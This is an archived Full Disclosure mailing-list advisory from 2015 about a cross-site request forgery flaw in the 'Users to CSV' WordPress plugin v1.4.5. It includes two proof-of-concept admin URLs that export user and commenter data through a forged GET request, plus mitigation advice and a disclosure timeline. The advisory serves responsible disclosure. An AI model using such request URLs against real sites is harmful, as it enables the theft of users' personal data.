[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAARZ5vo2WrgeN1m5L_FpFuHO5OAUQEfrUQMvQJqD9=Dw1T21eA@mail.gmail.com>
Date: Mon, 15 Jun 2015 13:15:01 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Cross-Site Request Forgery Vulnerability in Users to CSV
Wordpress Plugin v1.4.5
# Title: Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress
Plugin v1.4.5
# Submitter: Nitin Venkatesh
# Product: Users to CSV Wordpress Plugin
# Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled)
# Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active)
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.4.5 and possibly below.
# Tested versions: v1.4.5
# Fixed Version: None. Support for the plugin has been deceased.
# CVE Status: None/Unassigned/Fresh
## Product Information:
This plugin adds an admin screen under "Users", giving two options:
exporting the current users to a csv file and exporting the unique
commenters on your blog to a csv file.
## Vulnerability Description:
User information can be exported via a GET request to users.php via CSRF.
## Proof of Concept:
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments
## Solution:
Disable the plugin. Support has been ceased.
## Disclosure Timeline:
2015-06-08 - Discovered. Contacted developer.
2015-06-08 - Developer responds that support for plugin has ceased.
2015-06-13 - Noticed plugin site has been disabled. It must’ve happened
somewhere between 2015-06-09 and 2015-06-13. Contacted developer for
re-confirmation.
2015-06-14 - Developer gives go-ahead for publishing a disclosure.
2015-06-15 - Publishing disclosure on Full Disclosure mailing list.
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists